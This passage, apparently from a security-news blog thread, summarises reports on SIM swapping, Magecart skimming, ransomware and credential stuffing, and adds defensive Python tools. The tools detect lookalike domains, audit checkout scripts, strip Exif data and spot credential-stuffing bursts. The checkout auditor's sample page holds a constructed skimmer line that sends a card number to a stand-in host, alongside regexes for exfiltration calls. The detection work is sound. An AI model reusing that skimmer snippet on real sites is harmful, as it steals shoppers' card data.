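    cands |= {f"{name}.{t}" for t in ALT_TLDS if t != tld}       # TLD swap of the exact name
    return cands


def levenshtein(a: str, b: str) -> int:
    """Plain edit distance, used as a catch-all for variants the generators miss."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def flag_lookalikes(brand: str, observed: Iterable[str], max_distance: int = 1) -> List[Tuple[str, str]]:
    """Match newly seen domains (e.g. from a certificate-transparency or passive-DNS feed)
    against a brand and return (domain, reason) for each one worth a look."""
    brand = brand.lower()
    brand_name = brand.rpartition(".")[0]
    names = typosquat_names(brand_name)
    cands = typosquat_candidates(brand)
    hits = []
    for d in observed:
        d = d.lower().rstrip(".")
        if d == brand:
            continue
        name = d.rpartition(".")[0]
        if d in cands or name in names:
            hits.append((d, "generated-variant"))
        elif brand_name in name:
            hits.append((d, "contains-brand"))
        elif levenshtein(name, brand_name) <= max_distance:
            hits.append((d, f"edit-distance<={max_distance}"))
    return hits


# Constructed feed of newly observed domains (not real registrations).
OBSERVED = ["example.com", "exmaple.com", "examp1e.com", "example-login.com", "example.co",
            "examplesupport.net", "exampel.org", "exemple.io", "exampke.com", "unrelated.org"]

if __name__ == "__main__":
    for domain, reason in flag_lookalikes("example.com", OBSERVED):
        print(f"{domain}: {reason}")
```

The "contains-brand" and edit-distance rules are where the false positives live (short brand names match a lot), so in practice they feed a review queue while exact generated variants can go straight to takedown and mail-filter blocklists.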
Tomi Engdahl says:
Criminals Increasing SIM Swap Schemes to Steal Millions of Dollars from US Public
https://www.ic3.gov/Media/Y2022/PSA220208
The Federal Bureau of Investigation is issuing this announcement to inform mobile carriers and the public of the increasing use of Subscriber Identity Module (SIM) swapping by criminals to steal money from fiat and virtual currency accounts. From January 2018 to December 2020, the FBI Internet Crime Complaint Center (IC3) received 320 complaints related to SIM swapping incidents with adjusted losses of approximately $12 million. In 2021, IC3 received 1,611 SIM swapping complaints with adjusted losses of more than $68 million. Also:
https://www.bleepingcomputer.com/news/security/fbi-warns-of-criminals-escalating-sim-swap-attacks-to-steal-millions/
https://therecord.media/fbi-68-million-lost-to-sim-swapping-attacks-in-2021/
https://www.zdnet.com/article/fbi-warns-sim-swapping-attacks-are-rocketing-dont-brag-about-your-crypto-online/
Tomi Engdahl says:
Wave of MageCart attacks target hundreds of outdated Magento sites https://www.bleepingcomputer.com/news/security/wave-of-magecart-attacks-target-hundreds-of-outdated-magento-sites/
Analysts have found the source of a mass breach of over 500 e-commerce stores running the Magento 1 platform: a single domain loading a credit card skimmer on all of them. According to Sansec, the attack became evident late last month when their crawler discovered 374 infections on the same day, all using the same malware. The domain from which the threat actors loaded the malware is naturalfreshmall[.]com, currently offline, and the goal of the threat actors was to steal the credit card information of customers on the targeted online stores.
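A skimmer loaded from a single third-party domain is exactly what a checkout-page audit should catch: every script host that is not on an allowlist, every allowlisted script loaded without Subresource Integrity, and any inline script that reads card fields and also contains an exfiltration primitive. The script below is an added example, not code from Sansec or the article; the sample checkout HTML, the allowlisted host and the skimmer-like inline snippet are constructed.

```python
"""Audit a checkout page for Magecart-style skimmer indicators (added example).

Flags <script src> hosts outside an allowlist, allowlisted hosts loaded
without Subresource Integrity, and inline scripts that both read card
fields and contain an exfiltration primitive. The sample HTML and hosts
are constructed for this example.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

CARD_FIELD_RE = re.compile(r"(card[_-]?number|cc[_-]?num|cvv|cvc|expir)", re.I)
EXFIL_RE = re.compile(r"(fetch\(|XMLHttpRequest|sendBeacon|new Image\(|\.src\s*=)", re.I)


class ScriptCollector(HTMLParser):
    """Collects external script sources (with an SRI flag) and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external = []  # (src, has_integrity)
        self.inline = []
        self._capturing = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        a = dict(attrs)
        if a.get("src"):
            self.external.append((a["src"], "integrity" in a))
        else:
            self._capturing, self._buf = True, []

    def handle_data(self, data):
        if self._capturing:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._capturing:
            self._capturing = False
            self.inline.append("".join(self._buf))


def audit(html: str, allowed_hosts: set[str]) -> list[tuple[str, str]]:
    """Return (finding, detail) pairs for scripts that do not match the expected page."""
    p = ScriptCollector()
    p.feed(html)
    findings = []
    for src, has_sri in p.external:
        host = (urlparse(src).hostname or "").lower()
        if not host:
            continue  # relative URL: first-party, covered by the site's own change control
        if host not in allowed_hosts:
            findings.append(("unexpected-script-host", host))
        elif not has_sri:
            findings.append(("missing-sri", host))
    for body in p.inline:
        if CARD_FIELD_RE.search(body) and EXFIL_RE.search(body):
            findings.append(("inline-card-exfil", " ".join(body.split())[:60]))
    return findings


# Constructed checkout page: one first-party script, two from the allowlisted
# static host (one with SRI, one without), one from an unknown host, and two
# inline scripts of which the second behaves like a skimmer.
SAMPLE_HTML = """
<html><head>
<script src="/js/checkout.js"></script>
<script src="https://static.example-shop.com/lib.min.js" integrity="sha384-AAAA" crossorigin="anonymous"></script>
<script src="https://static.example-shop.com/other.js"></script>
<script src="https://assets.example-cdn.net/pixel.js"></script>
</head><body>
<form id="payment"><input id="card_number"><input id="cvv"></form>
<script>console.log("checkout ready");</script>
<script>
  var n = document.getElementById('card_number').value;
  new Image().src = 'https://assets.example-cdn.net/c?d=' + btoa(n);
</script>
</body></html>
"""
ALLOWED_HOSTS = {"static.example-shop.com"}

if __name__ == "__main__":
    for kind, detail in audit(SAMPLE_HTML, ALLOWED_HOSTS):
        print(f"{kind:24} {detail}")
```

Run it against a fetched copy of the live checkout page on a schedule and diff the findings; the same allowlist is what a script-src Content-Security-Policy on the checkout page should enforce, so that a store that is compromised the way described above at least cannot load the skimmer in the customer's browser.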
Tomi Engdahl says:
ESET Threat Report T3 2021
https://www.welivesecurity.com/2022/02/09/eset-threat-report-t32021/
While 2020 was the year of supply-chain attacks (and, yes, the start of the global COVID-19 crisis), 2021 was defined by shockingly severe vulnerabilities (and by vaccines). The year started with a bang, when Microsoft Exchange servers around the world found themselves under fire from at least ten APT groups. ProxyLogon, the vulnerability chain at the bottom of these attacks, ended up being the second most frequent external attack vector in 2021 according to ESET telemetry, right after password-guessing attacks. As you'll read in the ESET Threat Report T3 2021, Microsoft Exchange servers ended up under siege again in August 2021, with ProxyLogon's younger sibling, named ProxyShell, exploited worldwide by several threat groups.
Tomi Engdahl says:
Example of Cobalt Strike from Emotet infection https://isc.sans.edu/forums/diary/Example+of+Cobalt+Strike+from+Emotet+infection/28318/
Since early December 2021, we have seen reports of Emotet infections dropping Cobalt Strike malware (link). I’ve seen it occasionally since then, and I reported an example last week. Today’s diary reviews another Cobalt Strike sample dropped by an Emotet infection on Tuesday 2022-02-08. This was an infection from the epoch 5 botnet, and approximately 5 hours after the initial infection, Cobalt Strike traffic started on 2022-02-08 at 19:54 UTC. The Cobalt Strike binary was sent over HTTPS Emotet C2 traffic, so there were no indicators over the network for Cobalt Strike until the Cobalt Strike traffic started.
Tomi Engdahl says:
Windows Explorer has an option to remove properties from media files:
Remove Properties and Personal Information. For example, removing Exif data from JPEG files https://blog.didierstevens.com/2022/02/08/windows-explorer-improper-exif-data-removal/
There is an issue with this feature: it does not properly remove Exif data.
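Whatever a "remove personal information" button claims, the check is to walk the JPEG marker structure yourself and confirm no APP1 segment carrying Exif is left. The script below is an added example, not code from Didier Stevens' post; it parses the segment headers, reports Exif payloads and rebuilds the file without them, and uses a minimal constructed JPEG (not a real photo) as its sample.

```python
"""Verify and strip Exif (APP1) segments from a JPEG by walking its markers (added example).

A UI that claims to remove personal information should be checked with an
independent parser; this one reports whether an Exif APP1 segment is still
present and rebuilds the file without it. The sample JPEG is a minimal
constructed file, not a real photo.
"""
import struct

EOI, SOS, APP1 = 0xD9, 0xDA, 0xE1
EXIF_MAGIC = b"Exif\x00\x00"
STANDALONE = {0x01, *range(0xD0, 0xD8)}  # TEM, RST0..RST7: markers with no length field


def segments(data: bytes):
    """Yield (marker, start, end) for each header segment up to and including SOS."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG (missing SOI)")
    pos = 2
    while pos + 1 < len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected marker at offset {pos}")
        marker = data[pos + 1]
        if marker == EOI:
            yield (marker, pos, pos + 2)
            return
        if marker in STANDALONE:
            yield (marker, pos, pos + 2)
            pos += 2
            continue
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])  # length includes its own 2 bytes
        end = pos + 2 + length
        yield (marker, pos, end)
        if marker == SOS:
            return  # entropy-coded scan data follows; not parsed here
        pos = end


def exif_payloads(data: bytes) -> list[bytes]:
    """Return the payload of every APP1 segment that carries Exif."""
    return [data[start + 4:end] for marker, start, end in segments(data)
            if marker == APP1 and data[start + 4:end].startswith(EXIF_MAGIC)]


def has_exif(data: bytes) -> bool:
    return bool(exif_payloads(data))


def strip_exif(data: bytes) -> bytes:
    """Rebuild the JPEG without Exif APP1 segments; scan data is copied verbatim."""
    out = bytearray(b"\xff\xd8")
    for marker, start, end in segments(data):
        if marker == SOS:
            out += data[start:]  # SOS header + scan + EOI, untouched
            break
        if marker == APP1 and data[start + 4:end].startswith(EXIF_MAGIC):
            continue  # drop the whole segment, not just the fields inside it
        out += data[start:end]
    return bytes(out)


def _segment(marker: int, payload: bytes) -> bytes:
    return bytes([0xFF, marker]) + struct.pack(">H", len(payload) + 2) + payload


def build_sample_jpeg() -> bytes:
    """Constructed minimal JPEG: APP0 JFIF, APP1 Exif (empty IFD0), DQT, SOS, EOI."""
    app0 = b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    # little-endian TIFF header, IFD0 with 0 entries, no next IFD: 14 bytes
    tiff = b"II*\x00\x08\x00\x00\x00" + b"\x00\x00" + b"\x00\x00\x00\x00"
    exif = EXIF_MAGIC + tiff          # 20-byte payload, 24-byte segment
    dqt = b"\x00" + bytes(64)
    sos = b"\x01\x01\x00\x00\x3f\x00"
    scan = b"\x12\x34\x56"
    return (b"\xff\xd8" + _segment(0xE0, app0) + _segment(APP1, exif)
            + _segment(0xDB, dqt) + _segment(SOS, sos) + scan + b"\xff\xd9")


if __name__ == "__main__":
    original = build_sample_jpeg()
    cleaned = strip_exif(original)
    print("exif before:", has_exif(original), "after:", has_exif(cleaned))
```

Point has_exif() at the file Explorer produced rather than trusting the properties dialog; a file that still has an APP1 Exif segment has not been cleaned, regardless of what the UI shows.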
Tomi Engdahl says:
LolZarus: Lazarus Group Incorporating Lolbins into Campaigns https://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns
Qualys Threat Research has identified a new Lazarus campaign using employment phishing lures targeting the defence sector. The identified variants target job applicants for Lockheed Martin. This blog details the markers of this campaign, including macro content, campaign flow and phishing themes of our identified variants and older variants that have been attributed to Lazarus by other vendors.
Tomi Engdahl says:
Decryptor released for Maze, Egregor, and Sekhmet ransomware strains https://www.zdnet.com/article/decryptor-for-maze-egregor-and-sekhmet-ransomware-strains-released/
A decryptor has been released for the Maze, Sekhmet and Egregor ransomware families after someone published the master decryption keys in a BleepingComputer forum post. Around 6:30 yesterday evening, someone identifying themselves as “Topleak” said “It was decided to release keys to the public for Egregor, Maze, Sekhmet ransomware families.”
“Each archive with keys have corresponding keys inside the numeric folders which equal to advert id in the config. In the “OLD” folder of maze leak is keys for it’s old version with e-mail based. Consider to make decryptor first for this one, because there were too many regular PC users for this version,” the user wrote. Also:
https://www.bleepingcomputer.com/news/security/ransomware-dev-releases-egregor-maze-master-decryption-keys/
Tomi Engdahl says:
Dragos ICS/OT Ransomware Analysis: Q4 2021 https://www.dragos.com/blog/industry-news/dragos-ics-ot-ransomware-analysis-q4-2021/
A common misconception suggests ransomware is solely a threat to information technology (IT); however, data from 2021 indicates ransomware is having an increasing impact on operational technology (OT) as well. Dragos analyzed data from 37 ransomware strains on Dark Web resources leveraged to post victims, leak files, and conduct negotiations. Appearance on a Dark Web resource does not confirm that ransomware actors successfully compromised a firm, the extent of access achieved by the ransomware actors, or whether a firm made the ransomware payment.
Tomi Engdahl says:
Data Highlights Growing Threat From Intelligent Bots Operated at Scale by Cybercriminals
https://www.securityweek.com/data-highlights-growing-threat-intelligent-bots-operated-scale-cybercriminals
The intelligent bot revolution continues. Eighty-six percent of attacks against accounts are now driven by bots that have become 3 times more complex than those seen in earlier years – making it harder for security teams to detect bot signatures.
Details have been released in the 2022 State of Fraud and Account Security (PDF) published by Arkose Labs. Figures come from an analysis of actual user sessions and attack patterns seen on the Arkose Labs Fraud and Abuse Prevention Platform in 2021. This means that the figures cannot be applied to the entire market, but relate to those companies that have a sufficient fraud problem to seek protection from Arkose.
That said, the report is a stark indication of the growing threat from intelligent bots operated at scale by cybercriminals. Statistics show that 1 in 4 new account registrations are fake; 80% of login attacks are credential stuffing; there’s a 16% increase in mobile attack traffic; and 5 in 6 industries have seen an increase in attacks.
The report also shows how responsive the attackers are to user engagement. As user engagement increases, so do attacks. The gaming industry suffered what Arkose calls ‘unprecedented’ attacks in 2020 – probably due to an increase in gaming during the pandemic-induced lockdowns. As the lockdowns eased in 2021 and the gaming industry implemented new controls, gaming attacks declined 2x faster than user engagement.
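The "80% of login attacks are credential stuffing" figure is detectable on your own side without a vendor: stuffing shows up as one source trying many different usernames in a short window, mostly failing, and a success inside that burst is a likely account takeover. The detector below is an added example, not from the Arkose report; the log format and the log lines are constructed.

```python
"""Detect credential-stuffing bursts in an authentication log (added example).

Credential stuffing shows up as one source trying many *different*
usernames in a short window, mostly failing; a success inside that burst is
a likely account takeover. The log format and lines are constructed.
"""
import re
from collections import defaultdict, deque
from dataclasses import dataclass
from datetime import datetime

LINE_RE = re.compile(r"^(\S+) (\S+) login (\S+) (OK|FAIL)$")


@dataclass
class Event:
    ts: datetime
    ip: str
    user: str
    ok: bool


@dataclass
class Alert:
    ip: str
    distinct_failed_users: int
    successes_in_burst: list[str]
    at: datetime


def parse(lines) -> list[Event]:
    """Parse 'ISO-timestamp ip login user OK|FAIL' lines; other lines are ignored."""
    events = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts, ip, user, result = m.groups()
        events.append(Event(datetime.fromisoformat(ts.replace("Z", "+00:00")), ip, user, result == "OK"))
    return events


def detect(events, window_s: int = 60, min_users: int = 5) -> list[Alert]:
    """One alert per source IP that fails against >= min_users distinct accounts within window_s."""
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e.ip].append(e)
    alerts = []
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e.ts)
        window = deque()
        for e in evs:
            window.append(e)
            while (e.ts - window[0].ts).total_seconds() > window_s:
                window.popleft()
            failed_users = {x.user for x in window if not x.ok}
            if len(failed_users) >= min_users:
                ok_users = sorted({x.user for x in window if x.ok})
                alerts.append(Alert(ip, len(failed_users), ok_users, e.ts))
                break  # one alert per source; an analyst pivots from here
    return alerts


# Constructed log: 203.0.113.7 sprays six accounts (one succeeds),
# 198.51.100.9 is a user mistyping their own password, 192.0.2.44 stays below threshold.
SAMPLE_LOG = """\
2022-02-09T10:00:01Z 203.0.113.7 login alice FAIL
2022-02-09T10:00:03Z 203.0.113.7 login bob FAIL
2022-02-09T10:00:05Z 203.0.113.7 login carol FAIL
2022-02-09T10:00:07Z 203.0.113.7 login dave OK
2022-02-09T10:00:09Z 203.0.113.7 login erin FAIL
2022-02-09T10:00:11Z 203.0.113.7 login frank FAIL
2022-02-09T10:05:00Z 198.51.100.9 login bob FAIL
2022-02-09T10:05:10Z 198.51.100.9 login bob FAIL
2022-02-09T10:05:20Z 198.51.100.9 login bob OK
2022-02-09T10:06:00Z 192.0.2.44 login grace FAIL
2022-02-09T10:06:01Z 192.0.2.44 login heidi FAIL
""".splitlines()

if __name__ == "__main__":
    for a in detect(parse(SAMPLE_LOG)):
        print(f"{a.ip}: {a.distinct_failed_users} accounts failed in window, took over {a.successes_in_burst} at {a.at}")
```

The distinct-username count is the signal; a plain failed-login counter fires on the user who forgot their password and misses a bot that spreads its list across many source addresses, so in production the same logic is usually also keyed by ASN or by device fingerprint rather than by IP alone.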
Tomi Engdahl says:
FBI Received 1,600 SIM Swapping Complaints in 2021
https://www.securityweek.com/fbi-received-1600-sim-swapping-complaints-2021
The Federal Bureau of Investigation (FBI) this week announced that between 2018 and 2021 its Internet Crime Complaint Center (IC3) received more than 1,900 complaints related to SIM swapping.
SIM swapping is a form of fraud scheme in which threat actors employ various phishing and social engineering techniques to trick support personnel at mobile carriers into transferring a victim’s phone number to a SIM card in the attacker’s possession.
In some cases, the attackers may conduct the SIM swapping scheme with the help of an insider, or they may trick the wireless carrier employees into downloading malware that will later be used to hack the carrier’s systems to perform SIM swapping.
Once in the possession of the victim’s phone number, the threat actors receive all of their calls and texts, including two-factor authentication codes, which allows them to change the passwords associated with the victim’s email accounts and take them over.
This allows the attackers to gain access to the victim’s online and bank accounts and perform various other fraudulent operations, such as the theft of sensitive information, crypto assets, or funds from the victim’s bank account.
Tomi Engdahl says:
Protecting Cryptocurrencies and NFTs – What’s Old is New
https://www.securityweek.com/protecting-cryptocurrencies-and-nfts-whats-old-new
Five steps that end-users can take to protect themselves against cryptocurrency losses
There has been quite a bit of chatter around cryptocurrencies and non-fungible tokens (NFTs) of late. As with most topics these days, some of that chatter has been around the topic of security. Specifically, there seems to be quite a bit of interest around how attackers and fraudsters can compromise cryptocurrencies and NFTs. In particular, one topic of keen interest is how attackers and fraudsters can profit from illicit or fraudulent activities around cryptocurrencies. I would like to take a look at that along with the security of cryptocurrencies in this piece.
I should preface all of this by noting the obvious – I am no expert in cryptocurrencies. That being said, when I look at threats to cryptocurrencies, I see a case of what’s old is new again. What do I mean by that? While there is always the possibility that a cryptocurrency itself will be compromised, that is not likely to be where we will see the vast majority of fraud loss and theft. Why is that? Attackers and fraudsters are opportunistic and coin-operated. If they can easily make money targeting weaker links than the cryptocurrencies themselves, they will do so.
Given this, what are some steps that end-users can take to protect themselves against cryptocurrency losses? While not an exhaustive list, here are five steps end-users can take to protect themselves:
1. Use MFA: Wherever possible, enable multi-factor authentication (MFA). Stolen credentials abound on the darkweb, and some of those credentials likely belong to you. Requiring one or more factors in addition to a username and password can help reduce the risk of attackers and fraudsters gaining unauthorized access to your accounts.
2. Use known, reputable exchanges: Cryptocurrencies are not regulated like national currencies. This includes the exchanges used to buy and sell cryptocurrencies. Thus, it is best to be cautious when choosing an exchange. Choose a reputable, reliable, and respected exchange, preferably one that clearly and openly outlines its security measures.
3. Choose your cryptocurrency wisely: There are many different types of cryptocurrencies, and not all cryptocurrencies are created equal. Each has differing levels of security. Should you choose to purchase cryptocurrency, be sure to invest in one that is reputable.
4. Beware of social engineering: Phishing and other scams are a great way for attackers and fraudsters to steal credentials. Those credentials give them access to what they are after. The easiest way to gain access to the cryptocurrencies of others is to flat out ask them for the usernames and passwords to the resources that hold those assets. Don’t fall victim to it.
5. Guard your wallet: The end-user is likely the weakest link in the cryptocurrency chain. As such, access to the end-user digital wallet is exactly the type of target attackers and fraudsters eagerly pursue. Take steps with your digital wallet provider to ensure that you’ve leveraged their ability to help you lock down your account.
Although cryptocurrencies are relatively new, the strategies used by attackers and fraudsters to profit from them don’t appear to be. By understanding that end-users and intermediaries, rather than the cryptocurrencies themselves are the most likely targets for theft and fraud, end-users can take steps to protect themselves. The time invested in considering the points above and others is sure to pay dividends and help avoid fraud loss.
Tomi Engdahl says:
Log4j is the most exploited vulnerability
https://etn.fi/index.php/13-news/13154-log4j-on-eniten-hyoedynnetty-haavoittuvuus
In its January malware review, Check Point Research reports that the password stealer Lokibot, which has caused plenty of harm, is back on the lists. Trickbot has had to give up its top spot to Emotet, and Apache Log4j continues to be the most exploited vulnerability.
In January, Emotet displaced Trickbot, which had long held the top of the list. Emotet's prevalence is now 6 percent of organizations worldwide. Log4j is still causing problems in almost every other organization (47.4 percent), and most attacks now target the research and education sector.
The notorious Emotet botnet spreads most commonly through email messages containing malicious links or attachments. Trickbot and Emotet are often seen on the lists at the same time, because Trickbot opens the way for Emotet.
Tomi Engdahl says:
Heather Morgan and her husband, Ilya “Dutch” Lichtenstein, seemed to lead a successful life as tech entrepreneurs and thought leaders. But investigators with the IRS say they had a secret. https://trib.al/STZALGp
Tomi Engdahl says:
Cyberattacks against Linux are becoming more common
https://etn.fi/index.php/13-news/13159-kyberhyoekkaeykset-linuxia-vastaan-yleistyvaet
Linux is one of the world's most popular operating systems and in practice forms part of the core of today's digital infrastructure. Now it is becoming a route for many cybercriminals into multi-cloud environments, VMware warns in its recent security report.
The reason for this development is that most of today's security solutions focus on Windows-based threats, leaving many public and private clouds exposed to attacks targeting Linux-based applications.
According to Claes Sandahl, VMware's director of systems engineering, cybercriminals are increasingly using techniques and adding malware that target Linux-based operating systems to maximize the impact of their attacks with as little effort as possible. "Attackers see both public and private clouds as suitable targets, because they offer a path to critical infrastructure and confidential data. Unfortunately, today's security solutions often focus on countering Windows-based threats, leaving many applications vulnerable in both private and public clouds," Sandahl says.
Tomi Engdahl says:
Threat Report: Exposing Malware in Linux-Based Multi-Cloud Environments
https://www.vmware.com/resources/security/exposing-malware-in-multi-cloud.html?utm_source=blog&utm_medium=website&utm_campaign=linux-threat-report&utm_term=none&utm_content=none
Tomi Engdahl says:
Half of infected Office documents are downloaded from Google's cloud
https://etn.fi/index.php/13-news/13160-puolet-saastuneista-office-dokumenteista-ladataan-googlen-pilvestae
Every second one, i.e. 50 percent, of malware-infected Office documents was downloaded from Google's Drive cloud service last year. AtlasVPN's report also says that 37 percent of all malware is downloaded along with Office documents.
The report also shows that 19 percent of malicious Office documents are downloaded to users' machines from Microsoft's OneDrive service. The figures reflect the popularity of Google's cloud service. Microsoft SharePoint is the third most common platform for distributing malware via Office documents.
Google Drive overtook Microsoft OneDrive for the top spot; OneDrive led the distribution of malicious Office documents in 2020 with a 34 percent share. Four percent of all malicious Office documents were shared via Google's Gmail service.
Tomi Engdahl says:
University Project Cataloged 1,100 Ransomware Attacks on Critical Infrastructure
https://www.securityweek.com/university-project-cataloged-1100-ransomware-attacks-critical-infrastructure
A Temple University research project that tracks ransomware attacks on critical infrastructure has documented more than 1,100 incidents to date.
SecurityWeek first wrote about the project in September 2020, when the database included roughly 680 records. The latest version of the critical infrastructure ransomware attacks (CIRWA) database catalogs 1,137 incidents reported between November 2013 and January 31, 2022.
The database, available for free on request as a Microsoft Excel file, stores information on incidents reported by the media and cybersecurity companies.
Ransomware Targeted 14 of 16 U.S. Critical Infrastructure Sectors in 2021
https://www.securityweek.com/ransomware-targeted-14-16-us-critical-infrastructure-sectors-2021
US, UK and Australia Warn of Increase in Sophisticated Ransomware Attacks
An increase in attack sophistication is proof of the growing threat that ransomware poses to all organizations, cybersecurity agencies from the United States, United Kingdom, and Australia said on Wednesday.
Over the past several years, ransomware has become the most prevalent threat to organizations in private and public sectors alike, including financial services, food and agriculture, government, healthcare, and other critical infrastructure industries.
In the U.S., ransomware attacks targeted 14 of the 16 critical infrastructure sectors, as defined by the Department of Homeland Security.
Tomi Engdahl says:
The SASE Conversation in 2022, a Resolution for the Future
https://www.securityweek.com/sase-conversation-2022-resolution-future
SASE can be a game-changer to manage risk during the continuing journey to the cloud
In 2020 Gartner introduced Secure Access Service Edge (SASE), its security methodology for integrating network and security controls to ensure that users receive the correct, risk-based level of access to systems at any moment in time. SASE is gaining momentum and according to Gartner, more than 50 percent of organizations will have an adoption strategy by 2025. Security has become more important than ever for today’s business landscape.
Now, in 2022, I’m sure that many CISOs/CIOs have SASE as a business priority with pressure for a fast and successful implementation. But SASE cannot be simply completed using a tick on the New Year’s resolution list underneath ‘Veganuary’ and ‘Couchto5k.’ SASE is a multi-element end-to-end architecture. Some elements, such as Zero-Trust Network Access (ZTNA), are new for many organizations, but another, Cloud Access Security Broker (CASB), is mature technology and in daily use. Successful adoption of SASE will need time, resource investment and focus.
In an earlier article, Getting SASE without the Hyperbole, I discussed what SASE is and how it could be such a game-changer to manage risk during the continuing journey to the cloud. This emphasized the importance of user experience and ground-up design for success. The last thing any user needs is additional stress from a new security solution when workers are already dealing with continual switches between the office and home-based working (WFA).
Tomi Engdahl says:
IoT/connected Device Discovery and Security Auditing in Corporate Networks
https://thehackernews.com/2022/02/iotconnected-device-discovery-and.html
Tomi Engdahl says:
Log4j: Getting From Stopgap Remedies to Long-Term Solutions
This pervasive vulnerability will require continued care and attention to fully remediate and detect permutations. Here are some ways to get started.
https://www.darkreading.com/attacks-breaches/log4j-getting-from-stopgap-remedies-to-long-term-solutions
Tomi Engdahl says:
https://pentestmag.com/is-blockchain-the-perfect-defense-against-ddos-attacks/
Tomi Engdahl says:
Half Of Canadian Businesses Hit By Ransomware Are Paying The Full Ransom
Tomi Engdahl says:
https://www.forbes.com/sites/leemathews/2022/02/07/half-of-canadian-businesses-hit-by-ransomware-are-paying-the-full-ransom/
Tomi Engdahl says:
https://techcrunch.com/2022/02/07/irs-facial-recognition-id-me/
Tomi Engdahl says:
https://www.bleepingcomputer.com/news/security/law-enforcement-action-push-ransomware-gangs-to-surgical-attacks/
Tomi Engdahl says:
2021 Record Year for Cybersecurity M&A, Financing: Report
https://www.securityweek.com/2021-record-year-cybersecurity-ma-financing-report
2021 was a record year for the cybersecurity industry in terms of mergers and acquisitions, as well as funding activity, according to financial advisory firm Momentum Cyber.
Momentum’s 2022 Cybersecurity Almanac shows that total funding increased by 138% in 2021 compared to the previous year, from $12.4 billion to $29.3 billion in venture capital financing across more than 1,000 deals. This is almost as much as the investments announced in 2018-2020 combined ($30.3 billion).
Tomi Engdahl says:
Mike Masnick / Techdirt:
Senator Blumenthal admits the EARN IT Act won’t “offer a blanket exemption to using encryption as evidence”, after denying for two years it targets encryption — Senator Richard Blumenthal has now admitted that EARN IT is targeting encryption, something he denied for two years, and then just out and said it.
Senator Blumenthal, After Years Of Denial, Admits He’s Targeting Encryption With EARN IT
https://www.techdirt.com/articles/20220210/09311048445/senator-blumenthal-after-years-denial-admits-hes-targeting-encryption-with-earn-it.shtml
Tomi Engdahl says:
Dustin Volz / Wall Street Journal:
Senators Wyden and Heinrich: declassified docs show a CIA bulk surveillance program collecting Americans’ data without clear judicial or congressional oversight
Secret CIA Bulk Surveillance Program Includes Some Americans’ Records, Senators Say
The lawmakers called for the immediate declassification of details about the surveillance program and what data was collected
https://www.wsj.com/articles/secret-cia-bulk-surveillance-program-includes-some-americans-records-senators-say-11644549582?mod=djemalertNEWS
Tomi Engdahl says:
Russell Brandom / The Verge:
The Senate Judiciary Committee advances the EARN IT Act, targeting Section 230 sexual exploitation content protections, despite numerous free speech concerns
Anti-exploitation bill advances in Senate despite free speech concerns
https://www.theverge.com/2022/2/10/22927346/earn-it-act-markup-senate-judiciary-section-230-csam-non-consensual-porn?scrolla=5eb6d68b7fedc32c19ef33b4
Critics say the EARN IT Act would ‘make it far riskier for platforms to host user-generated content’
Tomi Engdahl says:
Ransomware surge prompts joint NCSC, CISA warning to safeguard systems https://portswigger.net/daily-swig/ransomware-surge-prompts-joint-ncsc-cisa-warning-to-safeguard-systems
The UK’s National Cyber Security Centre (NCSC), the US Cybersecurity and Infrastructure Security Agency (CISA), and the Australian Cyber Security Centre published a joint advisory (PDF) on Wednesday that highlighted the evolution of techniques deployed by cybercriminals and the growing maturity of the ransomware-as-a-service business model.
Ransomware victims paid more than $600 million to cybercriminals in 2021
https://therecord.media/ransomware-victims-paid-more-than-600-million-to-cybercriminals-in-2021/
More than $600 million in cryptocurrency could be tied to ransomware payments in 2021, with the Conti ransomware gang accounting for nearly one-third of those payments, blockchain analysis firm Chainalysis said in a report today.
Tomi Engdahl says:
Losses from romance scams hit a record $547 million in 2021, FTC says https://therecord.media/losses-from-romance-scams-hit-a-record-547-million-in-2021-ftc-says/
The US Federal Trade Commission on Thursday said that it measured a sharp increase in losses linked to romance scams in 2021, bringing total losses over the last five years to $1.3 billion. The FTC’s Consumer Sentinel Network, which collects reports about identity theft, coronavirus scams, and other schemes, said Americans lost $547 million to romance scams last year, up from $307 million in 2020 and $202 million in 2019. The FTC added that these figures likely only capture a small portion of losses suffered by consumers.
Tomi Engdahl says:
Google says default 2FA cut account breaches in half https://www.engadget.com/google-says-2fa-default-cut-account-breaches-193745716.html
Google’s decision to enable two-factor authentication by default appears to have borne fruit. The search firm has revealed that account breaches dropped by 50 percent among those users where 2FA (two-step verification in Google-speak) was auto-enabled. The plunge was proof the extra factor is “effective” in safeguarding your data, Google said, although it didn’t disclose the exact number of compromised accounts.
Tomi Engdahl says:
The FBI said approximately 24,000 Americans lost money from romance scams in 2021, mounting to $1 billion. Though reports of romance scams increased for every age group, the increase was greatest for people ages 18 to 29.
Americans Lost $1 Billion To Romance Scammers Last Year, FBI Says
https://lm.facebook.com/l.php?u=https%3A%2F%2Ftrib.al%2FujpmHd9&h=AT3w_yDsrKODT_EJJR–hKHaRpJjrMNdHufHNsgGaxsusebFXaZ_F-kfbMGpkrII7Qddcrwc0rXP5vs13I4MkfQHy0ePu6E9d2tc3-OGVtBk07V5zkCFcOt7z2C7HtQKLg
About 24,000 Americans lost a reported $1 billion to romance scammers during 2021, the FBI estimated Thursday, marking what the Federal Trade Commission said was the most lucrative year for romance scammers on record—with many scam artists luring their victims into sending cryptocurrency.
The FTC—which only counts scams reported to its Consumer Sentinel Network, a database for scams and crimes like identity theft—said Thursday losses from romance scams rose to $547 million in 2021, up from $307 million in 2020 and $202 million in 2019.
